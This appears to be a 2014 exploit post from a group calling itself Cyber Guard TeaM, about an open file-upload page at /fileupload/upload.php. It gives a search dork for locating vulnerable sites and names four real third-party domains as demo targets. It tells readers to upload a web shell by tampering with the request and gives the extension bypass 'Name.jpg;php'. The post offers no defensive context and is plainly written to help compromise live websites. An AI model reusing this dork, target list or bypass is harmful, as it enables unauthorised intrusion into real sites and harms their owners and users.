facebook facebook twitter rss

Upload Vulnerability by admin page

Author: Cyber Guard TeaM , Published: 13-06-2014
##############################################################
# Exploit Title : Upload Vulnerability by admin page
#
# Exploit Author : Cyber Guard TeaM
#
# Discovered By : Injector
#
# Home : Cyber-guard.org
#
# Dork : inurl:"/fileupload/upload.php"
#
# Date: 13/6/2014
#
# Tested on: Kali, Win7
#
##############################################################
VULNERABILITY

##############

[~] VULNERABILITY}~~


[~] http://www.site.com/[PATH]/fileupload/upload.php
[~] http://www.site.com/fileupload/upload.php

##############

Demo 1: http://www.vibanalysis.co.uk/fileupload/upload.php
Demo 2: http://cmslogin.portagepromotionals.ca/fileupload/upload.php
Demo 3: http://www.businesspanama.com/scripts/fileupload/upload.php
Demo 4: http://www.zabot.it/esempi/fileupload/upload.php
###############

There's a permission to upload your file size with admin and you can Uplaod your shell by Tamper data Or Live http headers

Shell bypass: Name.jpg;php

##############################################################
Special Thanks of : ICA, StorM and all members
##############################################################

Like us on Facebook :